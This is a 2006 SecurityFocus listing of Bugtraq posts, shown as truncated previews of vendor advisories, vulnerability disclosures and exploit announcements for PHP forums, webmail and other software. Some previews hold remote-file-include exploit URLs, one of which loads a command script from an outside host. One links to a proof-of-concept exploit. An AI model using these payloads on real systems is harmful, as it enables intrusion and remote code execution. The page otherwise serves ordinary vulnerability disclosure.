SecurityFocus

W-Agora 4.20 XSS 2006-04-29
r0xes ratm gmail com

PLEASE NOTE: I am not sure if HTML is an option. I looked through the Administration panel and did not see an option for it, and the fact that there is no BBcode leads me to believe that this is the method of BBCode/etc.

W-Agora is a fairly 'nice' bulletin board written in PHP. It allows multiple

[ more ] [ reply ]

Re: phpMyForum Cross Site Scripting & CRLF injection 2006-04-25
chris phpmyforum de

There is no such bug and even if I'am wrong, there's already version 4.1.3!

[ more ] [ reply ]

TopList <= 1.3.8 (PHPBB Hack) Remote File Inclusion Vulnerability 2006-04-28
mfoxhacker gmail com

####################################################

# IHST - MFox > MFoxHacker (at) gmail (dot) com [email concealed] #

####################################################

- Vendor = TopList (PHPBB)

- Target = list.php

- Exploit :

http://[target]/top/list.php?returnpath=[shell_url]

Bug Discovered by

[ more ] [ reply ]

Invision Power Board 2.1.5 POC 2006-04-27
Javier Olascoaga (jolascoaga 514 es)

Proof of concept for http://www.securityfocus.com/bid/17695/ can be
found in www.514.es

LINK: http://www.514.es/download/invvy-v2.pl

Best regards,

- J

#!/usr/bin/perl
# Wed Apr 26 16:44:15 CEST 2006 jolascoaga (at) 514 (dot) es [email concealed]
#
# INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept
#
# r

[ more ] [ reply ]

Re: VWar Path Disclosure 2006-04-26
spic g00ns net

The remote code execution was found by uid0 from www.exploitercode.com. He published it before anyone else did then it was ripped.

[ more ] [ reply ]

poll.pl<--remote commands execution exploit 2006-04-26
CrAzY CrAcKeR hotmail com

Subject:poll.pl<--remote commands execution

>>>>>>>>-----------------<<<<<<<<

foud by:CrAzY CrAcKeR
::::...alshmokh team...::::
Site: http://www.alshmokh.com

>>>>>>>>-----------------<<<<<<<<

Bug is found in this script:
open (HAND,"/web/htdocs/ronpoll/question") || die "Error opening file poll

[ more ] [ reply ]

[Kurdish Secure Advisory #1] I-RATER Platinum "Admin/configsettings.tpl.php" Remote File Include Vulnerability 2006-04-28
botan linuxmail org

Website : http://www.i-rater.com

Risk : High

Class : Remote

References :

http://www.securityfocus.com/bid/17623

Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend

Remote Code :

http://www.site.com/admin/config_settings.tpl.php?include_path=http://ww
w.evilrox.com/cmd.txt?&cmd=id

[ more ] [ reply ]

RE: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-28
Kornbrust, Alexander (ak red-database-security com) (1 replies)

Cesar, David and Steve,

I agree with your opinion. Oracle is not really fast fixing security
issues.

Currently I have 40+ OPEN/UNFIXED security issues in Oracle products. A
detailed list from Oracle secalert (Report March 2006) can be found at
the end of this email or (the latest version) on my w

[ more ] [ reply ]

Re: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-28
David Litchfield (davidl ngssoftware com)

Neomail.pl Local Cross Site Scripting 2006-04-28
outlaw aria-security net

#Aria-Security.net Advisory

#Discovered by: O.u.t.l.a.w

#< www.Aria-security.net >

#Gr33t to: A.u.r.a & R@1D3N & Smok3r

#-----------------------------------------------------------

Software: Neomail WebMail

Link: http://neomail.sourceforge.net/

Attack method: Cross Site Scripting

advisory:

[ more ] [ reply ]

[Kurdish Security #2] Artmedic Event Remote File Include Vulnerability 2006-04-28
botan linuxmail org

Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-i
nclude.html

#Artmedic Event Remote File Include Vulnerability

#Website : http://www.artmedic.de/

#Script : Artmedic Event Script

#Risk : High

#Class : Remote

#Greetz : B3g0k,Nistiman,Flot,Netqurd etc

[ more ] [ reply ]

[ GLSA 200604-18 ] Mozilla Suite: Multiple vulnerabilities 2006-04-28
Thierry Carrez (koon gentoo org)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200604-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ] [ reply ]

[Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP) 2006-04-28
botan linuxmail org

Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-
include.html

#ColMenus Event Remote File Include Vulnerability#

#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]

#Script : CoolMenus v4.0 Event Script

#Risk : High

#Class : Remo

[ more ] [ reply ]

[Argeniss] Alert - Yahoo! Mail XSS vulnerability 2006-04-28
Cesar (cesarc56 yahoo com)

Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicius script being executed on users
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail logi

[ more ] [ reply ]

[ECHO_ADV_31$2006] Sws Web Server 0.1.7 Strcpy() & Syslog() Format String Vulnerability 2006-04-28
the_day echo or id

------------------------------------------------------------------------
---------------

[ECHO_ADV_31$2006] Sws Web Server 0.1.7 Strcpy() & Syslog() Format String Vulnerability

------------------------------------------------------------------------
---------------

Author : Dedi Dwianto

Da

[ more ] [ reply ]

WinISO/UltraISO/MagicISO/PowerISO Directory Traversal Vulnerability 2006-04-28
Sowhat (smaillist gmail com)

WinISO/UltraISO/MagicISO/PowerISO Directory Traversal Vulnerability

By Sowhat of Nevis Labs
Date: 2006.04.28

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060428.txt

CVE: N/A

Vendor

WinISO Computing Inc.
EZB Systems, Inc.
MagicISO Inc.
PowerISO Computing, Inc.

Affected Softw

[ more ] [ reply ]

Secunia Research: Servant Salamander unacev2.dll Buffer OverflowVulnerability 2006-04-28
Secunia Research (remove-vuln secunia com)

======================================================================

Secunia Research 28/04/2006

- Servant Salamander unacev2.dll Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software.

[ more ] [ reply ]

Cireos Portal Cross Site Scripting 2006-04-28
outlaw aria-security net

#Aria-Security.net Advisory

#Discovered by: O.u.t.l.a.w

#< www.Aria-security.net>

#Gr33t to: A.u.r.a & R@1D3N & Smok3r

#-----------------------------------------------------------

Software: SirceOS Operative Solutions

Link: http://www.circeos.it

Attack method: Cross Site Scripting

advisory

[ more ] [ reply ]

Re: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-27
Steven M. Christey (coley mitre org) (1 replies)

>The recent Oracle exploit posted to Bugtraq
>(http://www.securityfocus.com/archive/1/431353) is actually an 0day
>and has no patch.

The referenced exploit seems to use GET_DOMAIN_INDEX_METADATA with a
TYPE_NAME that references an attacker-defined package with a
(modified?) ODCIIndexGetMeta functi

[ more ] [ reply ]

Re: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-28
David Litchfield (davidl ngssoftware com) (1 replies)

Re: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-28
Cesar (cesarc56 yahoo com)

BL4's SMTP server BufferOverflow Vulnerable 2006-04-27
the_day echo or id

------------------------------------------------------------------------
---

[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable

------------------------------------------------------------------------
---

Author : Dedi Dwianto

Date : April, 27th 2006

Location : Ind

[ more ] [ reply ]

[SECURITY] [DSA 1045-1] New OpenVPN packages fix arbitrary code execution 2006-04-27
joey infodrom org (Martin Schulze)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1045-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
April 27th, 2006

[ more ] [ reply ]

[USN-275-1] Mozilla vulnerabilities 2006-04-27
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-275-1 April 27, 2006
mozilla vulnerabilities
CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0748,
CVE-2006-0749, CVE-2006-1727, CVE-2006-1728, CVE-2006-1729,
CVE-2006-1730, CVE-2006-1731, CVE-2006-1732

[ more ] [ reply ]

Re: Instant Photo Gallery <= Multiple XSS 2006-04-27
Steven M. Christey (coley mitre org)

security curmudgeon mentioned:

> /portfolio.php?cat_id=[XSS]

Based on source inspection of 1.0.2, this parameter is cleansed.

line 31 of portfolio.php says:

$catId = $dbFilter->db_clean_input($_GET['cat_id'], 'integer');

which looks like it's going to do input validation as an integer.

BUT

[ more ] [ reply ]

[SECURITY] [DSA 1046-1] New Mozilla packages fix several vulnerabilities 2006-04-27
joey infodrom org (Martin Schulze)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1046-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
April 27th, 2006

[ more ] [ reply ]

[security bulletin] HPSBMA02113 SSRT061148 rev.1 - HP Oracle for OpenView (OfO) Critical Patch Update April 2006 2006-04-27
security-alert hp com

[security bulletin] HPSBUX02075 SSRT051074 rev.4 - HP-UX Running xterm Local Unauthorized Access 2006-04-27
security-alert hp com